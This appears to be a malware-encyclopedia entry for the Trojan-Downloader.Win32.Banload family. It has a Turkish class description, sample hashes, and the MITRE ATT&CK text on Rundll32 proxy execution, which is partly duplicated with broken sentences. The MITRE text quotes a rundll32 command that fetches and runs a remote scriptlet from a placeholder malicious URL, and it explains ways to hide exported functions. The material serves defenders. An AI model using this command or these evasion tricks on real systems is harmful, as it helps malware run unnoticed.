Sınıf: Trojan-Downloader
Trojan-Downloader olarak sınıflandırılan programlar, kurban bilgisayarlarında Truva atları ve AdWare dahil olmak üzere kötü amaçlı programların yeni sürümlerini indirir ve yükler. İnternetten indirildikten sonra, programlar başlatıldığında veya işletim sistemi başlatıldığında otomatik olarak çalışacak programların listesine dahil edilir. İndirilen programların isimleri ve konumları ile ilgili bilgiler Truva kodunda ya da bir internet kaynağından (genellikle bir web sayfasından) Trojan tarafından indirilmektedir. Bu tür kötü amaçlı program, ziyaretçilerin ilk olarak, istismar içeren web sitelerine bulaşmasında kullanılır.Platform: Win32
Win32, 32-bit uygulamaların yürütülmesini destekleyen Windows NT tabanlı işletim sistemlerinde (Windows XP, Windows 7, vb.) Bir API'dir. Dünyanın en yaygın programlama platformlarından biri.Aile: Trojan-Downloader.Win32.Banload
No family descriptionExamples
2BFFAE597CB4485A8EDCE661D6B664B39CE3AF68CEF23C6C19AEDDBC1A0A2B9D
D3F7974EF64A92AA611DA008C5507EB4
CFFB197822958960991FCCCF3B05E0D6
24F491F414EAAEEBB156838C7082507F
Tactics and Techniques: Mitre*
TA0005
Defense Evasion
The adversary is trying to avoid being detected.
Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.
Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.
T1218.011
System Binary Proxy Execution: Rundll32
Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex:
Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this:
Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command
Additionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion)
rundll32.exe {DLLname, DLLfunction}).Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions
Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command
rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll) DLL functions can also be exported and executed by an ordinal number (ex: rundll32.exe file.dll,#1).Additionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion)
* © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.